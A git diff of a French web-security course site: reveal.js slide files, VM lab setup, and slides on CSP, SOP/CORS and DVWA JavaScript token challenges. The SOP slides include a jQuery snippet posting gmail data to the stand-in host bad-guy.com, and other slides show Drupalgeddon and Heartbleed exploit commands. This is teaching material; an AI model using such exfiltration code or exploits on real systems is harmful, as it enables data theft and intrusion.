diff --git a/content/Etudiants/zz2-f5-websec.md b/content/Etudiants/zz2-f5-websec.md
index 5ff48e548fdfe1ffee47dd50815edce8c19d51e6..97899453287133eb880d96624f6e0e594ee37ca8 100644
--- a/content/Etudiants/zz2-f5-websec.md
+++ b/content/Etudiants/zz2-f5-websec.md
@@ -5,6 +5,8 @@ Tags: cours
[TOC]
+## Supports de cours
+
<div class="panel panel-success">
<div class="panel-heading">
<h3 class="panel-title">đ Personnaliser les slides</h3>
@@ -16,7 +18,40 @@ Tags: cours
</div>
</div>
-## Contexte
+<div class="panel panel-success">
+ <div class="panel-heading">
+ <h3 class="panel-title">đĄ Version PDF</h3>
+ </div>
+ <div class="panel-body">
+ <ul>
+ <li>Tous les slides sont fait avec <a href="https://github.com/hakimel/reveal.js">reveal.js</a>
+ <ul>
+ <li>ils sont exportables en pdf en ajoutant <code>?print-pdf#</code> Ă l'url (Ă coller juste aprĂšs le <code>.html</code>) et en passant par l'impression dans un fichier du navigateur chrome ou (mieux) <a href="https://www.chromium.org/">chromium</a>
+ <ul>
+ <li>plus de détails sur l'<a href="https://github.com/hakimel/reveal.js/#pdf-export">export PDF de reveal</a></li>
+ </ul>
+ </li>
+ </ul>
+ </li>
+ </ul>
+ </div>
+</div>
+
+<div class="panel panel-success">
+ <div class="panel-heading">
+ <h3 class="panel-title">đȘ Contributions</h3>
+ </div>
+ <div class="panel-body">
+ <ul>
+ <li>
+ n'hésitez pas à me signaler des liens morts et / ou à en proposer de nouveaux via une <a href="https://gitlab.isima.fr/vimazeno/blog.limos.fr/-/issues">issue</a> ou directement via un <a href="https://gitlab.isima.fr/vimazeno/blog.limos.fr/-/merge_requests">PR/MR</a>
+ </li>
+ </ul>
+ </div>
+</div>
+
+
+### Contexte
<ul>
<li>
@@ -52,7 +87,7 @@ Tags: cours
<li>
<a href="slides/1337/heartbleed.html"
class="customizable">
- Heartbleed <i class="fas fa-tools"></i>
+ Heartbleed
</a>
</li>
</ul>
@@ -60,13 +95,13 @@ Tags: cours
<li>
<a href="slides/1337/browser.html"
class="customizable">
- Browsers <i class="fas fa-hammer"></i>
+ Browser
</a>
</li>
<li>
<a href="slides/1337/js.html"
class="customizable">
- Javascript <i class="fas fa-hammer"></i>
+ Javascript
</a>
</li>
<li>
@@ -77,7 +112,7 @@ Tags: cours
</li>
</ul>
-## Vulnérabilités communes
+### Vulnérabilités communes
<ul>
<li>
@@ -109,7 +144,7 @@ Tags: cours
<li>
<a href="slides/1337/shellshock.html"
class="customizable">
- Shellshock <i class="fas fa-tools"></i>
+ Shellshock
</a>
</li>
</ul>
@@ -169,47 +204,26 @@ Tags: cours
<li>
<a href="slides/1337/drupalgeddon.html"
class="customizable">
- Drupalgeddon <i class="fas fa-tools"></i>
+ Drupalgeddon
</a>
</li>
</ul>
</li>
</ul>
-## Pentesting
+### Pentesting
* [Collecter](slides/1337/gathering.html)
* [DĂ©tecter](slides/1337/detecting.html)
-## Se protéger
+### Se protéger
* [Top10](slides/1337/top10.html)
* [anticiper](slides/1337/anticiper.html)
<hr />
-<div class="panel panel-success">
- <div class="panel-heading">
- <h3 class="panel-title">FYI</h3>
- </div>
- <div class="panel-body">
- <ul>
- <li>Tous les slides sont fait avec <a href="https://github.com/hakimel/reveal.js">reveal.js</a>
- <ul>
- <li>ils sont exportables en pdf en ajoutant <code>?print-pdf#</code> Ă l'url (Ă coller juste aprĂšs le <code>.html</code>) et en passant par l'impression dans un fichier du navigateur chrome ou (mieux) <a href="https://www.chromium.org/">chromium</a>
- <ul>
- <li>plus de détails sur l'<a href="https://github.com/hakimel/reveal.js/#pdf-export">export PDF de reveal</a></li>
- </ul>
- </li>
- </ul>
- </li>
- <li>
- n'hésitez à me signaler des liens morts et / ou à en proposer de nouveaux via une <a href="https://gitlab.isima.fr/vimazeno/blog.limos.fr/-/issues">issue</a> ou directement via un <a href="https://gitlab.isima.fr/vimazeno/blog.limos.fr/-/merge_requests">PR/MR</a>
- </li>
- </ul>
- </div>
-</div>
-
+## Installer DVWA sur sa VM perso
## Recréer l'environnement de cours dans VirtualBox
* testé avec [VirtualBox 5.2.18](https://download.virtualbox.org/virtualbox/5.2.18/virtualbox-5.2_5.2.18-124319~Ubuntu~bionic_amd64.deb) sous [Ubuntu Bionic](http://releases.ubuntu.com/bionic/)
@@ -240,11 +254,10 @@ wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/debian.ova
wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/proxy.ova&dl=1
wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/kali.ova&dl=1
wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/thenetwork.ova&dl=1
-wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/ubuntu-server-18.04.ova&dl=1
```
<div class="panel panel-warning">
<div class="panel-heading">
- <h3 class="panel-title">FYI</h3>
+ <h3 class="panel-title">đą FYI</h3>
</div>
<div class="panel-body">
il y a environ 7 Go d'images, n'hésitez pas à vous les faire passer via des clés USB
@@ -258,7 +271,6 @@ vboxmanage import debian.ova
vboxmanage import proxy.ova
vboxmanage import kali.ova
vboxmanage import thenetwork.ova
-vboxmanage ubuntu-server-18.04.ova
```
### Configurer le réseau pour chaque vm
@@ -268,7 +280,6 @@ vboxmanage modifyvm debian --nic1 natnetwork --nat-network1 natwebsec
vboxmanage modifyvm proxy --nic1 natnetwork --nat-network1 natwebsec
vboxmanage modifyvm kali --nic1 natnetwork --nat-network1 natwebsec
vboxmanage modifyvm thenetwork --nic1 natnetwork --nat-network1 natwebsec
-vboxmanage modifyvm ubuntu-server-18.04 --nic1 natnetwork --nat-network1 natwebsec
```
@@ -280,7 +291,6 @@ vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127.
vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127.0.0.1]:1723:[172.16.76.143]:22"
vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127.0.0.1]:1724:[172.16.76.144]:22"
vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127.0.0.1]:1725:[172.16.76.145]:22"
-vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127.0.0.1]:1726:[172.16.76.146]:22"
```
### (optionnel) Se connecter en ssh
@@ -293,7 +303,7 @@ ssh -p 1725 mazenovi@127.0.0.1 #kali
ssh -p 1726 mazenovi@127.0.0.1 #ubuntu server 18.04
```
-## (fix) En cas de réseau injoignable sur proxy et thenetwork
+### (fix) En cas de réseau injoignable sur proxy et thenetwork
si
@@ -368,7 +378,7 @@ ping 172.16.76.145 # ping sur kali
Ce bug est dû à la numérotation fantaisiste d'Ubuntu des interfaces réseau ...
-## liste des vms / noms de domaine
+### Liste des vms / noms de domaine (/etc/hosts)
```
# SecLab
diff --git a/content/slides/1337/bruteforce.html b/content/slides/1337/bruteforce.html
new file mode 100644
index 0000000000000000000000000000000000000000..3fc0aff4d393bf2f1672169026b79fdd5ddbe708
--- /dev/null
+++ b/content/slides/1337/bruteforce.html
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>Brute Force</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/bruteforce.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
+ Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/1337/captcha.html b/content/slides/1337/captcha.html
new file mode 100644
index 0000000000000000000000000000000000000000..04279c32752d0454c2c554db43ad377c50aed966
--- /dev/null
+++ b/content/slides/1337/captcha.html
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>Captcha</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/browser.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
+ Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/1337/csp.html b/content/slides/1337/csp.html
new file mode 100644
index 0000000000000000000000000000000000000000..cd6be269718e49448534e1241d9a38d1b0c9fd10
--- /dev/null
+++ b/content/slides/1337/csp.html
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>CSP</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/csp.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
+ Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/1337/js.html b/content/slides/1337/js.html
index c747cb5be2733541adfc63310815ca0527059bf1..809957e39c02ed8ae4bacffa39035ef3d82b3ef4 100644
--- a/content/slides/1337/js.html
+++ b/content/slides/1337/js.html
@@ -11,7 +11,7 @@
<!-- Theme used for syntax highlighting of code -->
<link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
- <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
<link rel="stylesheet" href="../main.css">
<!-- Printing and PDF exports -->
diff --git a/content/slides/1337/md/browser.md b/content/slides/1337/md/browser.md
index 7a47608459ec76e0fe1e57bf52dfefcef37b9d98..62fdfc6efe7e147381a2219957df860016dcdb3b 100644
--- a/content/slides/1337/md/browser.md
+++ b/content/slides/1337/md/browser.md
@@ -22,119 +22,4 @@ Un navigateur web est un logiciel conçu pour consulter et afficher le World Wid
* [Navigateur web](https://fr.wikipedia.org/wiki/Navigateur_web)
* [moz://a > Lâhistoire des navigateurs web](https://www.mozilla.org/fr/firefox/browsers/browser-history/)
-Dans la plupart des cas un navigateur embarque un interpréteur [javascript](js.html): ce qui induit quelque garde fous ...
-
-
-## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
-
-* En-tĂȘte renvoyĂ©e cĂŽtĂ© serveur
- * protéger son contenu
- * protéger ses utilisateurs
- * possibilité de reporting
- * quelles tentatives ont été menées
-
-
-## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
-
-```http
-Content-Security-Policy: script-src 'self' https://apis.google.com; frame-src 'none'
-```
-
-* informera le browser que
- * seuls les scripts en provenance de la page elle mĂȘme et de apis.google.com pourront ĂȘtre exĂ©cutĂ©s
- * les balises iframes ne doivent pas ĂȘtre interprĂ©tĂ©es
-
-
-## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
-
-<!-- .element style="text-align: center" -->
-
-* [<i class="fa fa-newspaper-o"></i> Why is CSP Failing? Trends and Challenges in CSP Adoption](mweissbacher.com/publications/csp_raid.pdf)
-
-Note:
-- couvre le cas d'un XSS js dans une balise src
-- couvre également le cas d'une iframe qui recouvre une page légitime
-
-
-## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/)
-
- * concerne *XMLHttpRequest*
- * restreint les interactionsaux ressources de mĂȘme origine
- * protocole + "://" + hĂŽte + ":" + [port]
-
-
-## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/)
-
-protÚge l'intégrité de la page
-
-```js
-$(function() { // on Load jQuery style
- $.ajax({
- url: "http://bad-guy.com/data.php"
- }).done(function(untrustedData) {
- injectInMyDOM(untrustedData);
- });
-});
-```
-
-<!-- .element style="text-align: center" -->
-
-
-## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/)
-
-protÚge la confidentialité des sessions
-
-```js
-$(function() { // on Load jQuery style
- $.ajax({
- url: "https://gmail.com"
- }).done(function(sensitiveData) {
- $.post("http://bad-guy.com/data.php", {
- sensitive_data: sensitiveData
- });
- });
-});
-```
-
-
-## [<i class="fa fa-medkit"></i> **CORS**: Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS)
-
-* contrĂŽler les accĂšs en mode cross-site
- * concerne l'Ă©change entre fournisseurs de services
-* effectuer des transferts de données sécurisés
- * entre sources sûres niveau injection & confidentialité
-
-
-## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS)
-
-le client ajoute automatiquement une en-tĂȘte HTTP
-
-```http
-Origin: http://www.foo.com
-```
-
-le serveur doit ajouter une en tĂȘte HTTP d'autorisation pour le domaine
-
-```http
-Access-Control-Allow-Origin: http://www.foo.com
-```
-
-en-tĂȘte d'autorisation pour tous les domaines
-
-```http
-Access-Control-Allow-Origin: *
-```
-
-
-## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS)
-
-* autorise tous les verbes HTTP
- * [JSONP](http://igm.univ-mlv.fr/~dr/XPOSE2009/ajax_sop_jsonp/jsonp_presentation.html) n'autorisait que la méthode GET
-
- * [<i class="fab fa-stack-overflow"></i> Disable firefox same origin policy](http://stackoverflow.com/questions/17088609/disable-firefox-same-origin-policy)
-
-Note:
-- l'introduction de cette nouvelle possibilitĂ© implique nĂ©cessairement que les serveurs doivent gĂ©rer de nouvelles entĂȘtes, et doivent renvoyer les ressources avec de nouvelles entĂȘtes Ă©galement
-- doit ĂȘtre supportĂ© par le navigateur
-- la valeur * est possible mais risquée
-- requĂȘtes simples, prĂ©-vĂ©rifiĂ©es avec le verbe OPTIONS, avec habilitations en forcant l'envoie du cookie
+Dans la plupart des cas un navigateur embarque un interpréteur [javascript](js.html): ce qui induit quelque garde fous ...
\ No newline at end of file
diff --git a/content/slides/1337/md/bruteforce.md b/content/slides/1337/md/bruteforce.md
new file mode 100644
index 0000000000000000000000000000000000000000..5c515973ba22ff75383154dc8bda3ef8c3efca5c
--- /dev/null
+++ b/content/slides/1337/md/bruteforce.md
@@ -0,0 +1 @@
+# Brute Force
\ No newline at end of file
diff --git a/content/slides/1337/md/captacha.md b/content/slides/1337/md/captcha.md
similarity index 100%
rename from content/slides/1337/md/captacha.md
rename to content/slides/1337/md/captcha.md
diff --git a/content/slides/1337/md/csp.md b/content/slides/1337/md/csp.md
new file mode 100644
index 0000000000000000000000000000000000000000..c9ad867f7dee1a9ae9368b1c58129a9b914cce70
--- /dev/null
+++ b/content/slides/1337/md/csp.md
@@ -0,0 +1,36 @@
+# CSP
+
+## a.k.a. Content Security Policy
+
+
+## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
+
+* En-tĂȘte renvoyĂ©e cĂŽtĂ© serveur
+ * protéger son contenu
+ * protéger ses utilisateurs
+ * possibilité de reporting
+ * quelles tentatives ont été menées
+
+
+## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
+
+```http
+Content-Security-Policy: script-src 'self' https://apis.google.com; frame-src 'none'
+```
+
+* informera le browser que
+ * seuls les scripts en provenance de la page elle mĂȘme et de apis.google.com pourront ĂȘtre exĂ©cutĂ©s
+ * les balises iframes ne doivent pas ĂȘtre interprĂ©tĂ©es
+
+
+## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
+
+<!-- .element style="text-align: center" -->
+
+* [<i class="fa fa-newspaper-o"></i> Why is CSP Failing? Trends and Challenges in CSP Adoption](mweissbacher.com/publications/csp_raid.pdf)
+
+Note:
+- couvre le cas d'un XSS js dans une balise src
+- couvre également le cas d'une iframe qui recouvre une page légitime
+
+
diff --git a/content/slides/1337/md/drupalgeddon.md b/content/slides/1337/md/drupalgeddon.md
index af15842d579bdd07fa22a1e5fdbf76ab9bf80caa..440e199d4cebfd15094cfc013b15fea6815e8d8a 100644
--- a/content/slides/1337/md/drupalgeddon.md
+++ b/content/slides/1337/md/drupalgeddon.md
@@ -172,7 +172,7 @@ $ php attack/inject-sql.php 'http://drup.al' 'DELETE FROM flood'
* [Drupal 7 Sql Injection SA-CORE-2014-005 CVE-2014-3704](http://www.homelab.it/index.php/2014/10/17/drupal-7-sql-injection/)
```shell
-python drup4l_7_31_SqlInj_add_admin.py -t http://drup.al -u 1337 -p 1337
+python2 drup4l_7_31_SqlInj_add_admin.py -t http://drup.al -u 1337 -p 1337
```
* représente 26% d'utilisation de la faille
* industrialisé pour vendre du viagra
diff --git a/content/slides/1337/md/heartbleed.md b/content/slides/1337/md/heartbleed.md
index 26e25bd1bc2bbcab9408406709d99a408ae0f7ed..a7b98228bc75d074180c58f8f0e3dce7fe51835b 100644
--- a/content/slides/1337/md/heartbleed.md
+++ b/content/slides/1337/md/heartbleed.md
@@ -171,7 +171,7 @@ PORT STATE SERVICE
### exploit <i class="fa fa-spinner fa-spin"></i>
```bash
-$ python hb-test.py heart.bleed > hb.dump \
+$ python2 hb-test.py heart.bleed > hb.dump \
&& cat hb.dump | tail -n +10 | head -n 40
00e0: 63 65 70 74 2D 4C 61 6E 67 75 61 67 ..Accept-Languag
00f0: 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E e: en-US,en;q=0.
diff --git a/content/slides/1337/md/js.md b/content/slides/1337/md/js.md
index 2f9ae0c06e8f4f96f0e2f9f2f0cd025cfedfee93..f80d2495e4553ccb5b6eac526e34d35a15437242 100644
--- a/content/slides/1337/md/js.md
+++ b/content/slides/1337/md/js.md
@@ -165,4 +165,118 @@ directement dans les événements associés à un élément du DOM
* https://www.typescriptlang.org/
* https://nodejs.org/
* https://fr.reactjs.org/
-* https://vuejs.org/
\ No newline at end of file
+* https://vuejs.org/
+
+
+### <i class="fa-solid fa-bomb"></i> Javascript / Low
+
+* analyse de la requĂȘte / formulaire
+ * champs hidden `token`
+ * https://beautifier.io
+ ```
+ token = md5(rot13(phrase))
+ ```
+
+* forcer
+ ```
+ token = md5(rot13("success"))
+ ```
+ * via la console / explorer du navigateur (F12)
+
+
+### <i class="fa-solid fa-bomb"></i> Javascript / Medium
+
+* analyse de la requĂȘte / formulaire
+ * champs hidden `token`
+ ```
+ "XX" + reverse("ChangeMe") + "XX"
+ ```
+
+* forcer
+ ```
+ token = "XXsseccusXX"
+ ```
+ * via la console / explorer du navigateur (F12)
+
+
+### <i class="fa-solid fa-bomb"></i> Javascript / High
+
+* analyse de la requĂȘte / formulaire
+ * champs hidden `token`
+ * interception de la requĂȘte avec `burpsuite`
+ * la valeur soumise n'est pas celle du champs original
+* le code js est incompréhensible
+ * <i class="fa-solid fa-screwdriver-wrench"></i> [http://deobfuscatejavascript.com](http://deobfuscatejavascript.com/#)
+
+
+### <i class="fa-solid fa-bomb"></i> Javascript / High
+
+1.
+ ```js
+ document
+ .getElementById("phrase")
+ .value = "";
+ ```
+2.
+ ```js
+ token_part_1("ABCD", 44);
+ ```
+ *
+ ```js
+ do_something(phrase);
+ ```
+ * inverse la phrase
+ * mais elle est vide
+
+
+### <i class="fa-solid fa-bomb"></i> Javascript / High
+
+3. `token_part_2("XX")` est exécutée aprÚs 300ms
+ ```js
+ document
+ .getElementById("token")
+ .value = sha256(
+ "XX"
+ + document
+ .getElementById("phrase")
+ .value
+ )
+ ```
+ * c'est bien la valeur du token pour une phrase vide
+
+
+### <i class="fa-solid fa-bomb"></i> Javascript / High
+
+4. La soumission du formulaire déclenche `token_part_3("ZZ")`
+ * le paramÚtre `t` n'est pas utilisé
+ * le jeton envoyĂ© dans la requĂȘte est
+
+```js
+sha256(document.getElementById("token").value + "ZZ")
+```
+```js
+sha256(
+ sha256("XX" + document.getElementById("phrase").value)
+ + "ZZ"
+)
+```
+
+
+### <i class="fa-solid fa-bomb"></i> Javascript / High
+
+* considérant qu'en `2` la phrase a été inversée
+
+```js
+token = sha256(sha256("XX" + "sseccus") + "ZZ")
+//ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84
+```
+
+ * mais `token_part_3` est toujours appelé à la soumission du formulaire
+ * il faut forcer token avec
+
+```js
+sha256("XX" + "sseccus")
+//7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a
+```
+
+et bien mettre la phrase Ă `success`
\ No newline at end of file
diff --git a/content/slides/1337/md/session.md b/content/slides/1337/md/session.md
new file mode 100644
index 0000000000000000000000000000000000000000..6f937a2ea6f7076343184ad31dbece177ff313a4
--- /dev/null
+++ b/content/slides/1337/md/session.md
@@ -0,0 +1 @@
+# session
\ No newline at end of file
diff --git a/content/slides/1337/md/sop.md b/content/slides/1337/md/sop.md
new file mode 100644
index 0000000000000000000000000000000000000000..457770d2889e1c7e89474b13c820d7ee7afd8d90
--- /dev/null
+++ b/content/slides/1337/md/sop.md
@@ -0,0 +1,86 @@
+# SOP
+
+## a.k.a Same Origin Policy
+
+## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/)
+
+ * concerne *XMLHttpRequest*
+ * restreint les interactionsaux ressources de mĂȘme origine
+ * protocole + "://" + hĂŽte + ":" + [port]
+
+
+## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/)
+
+protÚge l'intégrité de la page
+
+```js
+$(function() { // on Load jQuery style
+ $.ajax({
+ url: "http://bad-guy.com/data.php"
+ }).done(function(untrustedData) {
+ injectInMyDOM(untrustedData);
+ });
+});
+```
+
+<!-- .element style="text-align: center" -->
+
+
+## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/)
+
+protÚge la confidentialité des sessions
+
+```js
+$(function() { // on Load jQuery style
+ $.ajax({
+ url: "https://gmail.com"
+ }).done(function(sensitiveData) {
+ $.post("http://bad-guy.com/data.php", {
+ sensitive_data: sensitiveData
+ });
+ });
+});
+```
+
+
+## [<i class="fa fa-medkit"></i> **CORS**: Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS)
+
+* contrĂŽler les accĂšs en mode cross-site
+ * concerne l'Ă©change entre fournisseurs de services
+* effectuer des transferts de données sécurisés
+ * entre sources sûres niveau injection & confidentialité
+
+
+## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS)
+
+le client ajoute automatiquement une en-tĂȘte HTTP
+
+```http
+Origin: http://www.foo.com
+```
+
+le serveur doit ajouter une en tĂȘte HTTP d'autorisation pour le domaine
+
+```http
+Access-Control-Allow-Origin: http://www.foo.com
+```
+
+en-tĂȘte d'autorisation pour tous les domaines
+
+```http
+Access-Control-Allow-Origin: *
+```
+
+
+## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS)
+
+* autorise tous les verbes HTTP
+ * [JSONP](http://igm.univ-mlv.fr/~dr/XPOSE2009/ajax_sop_jsonp/jsonp_presentation.html) n'autorisait que la méthode GET
+
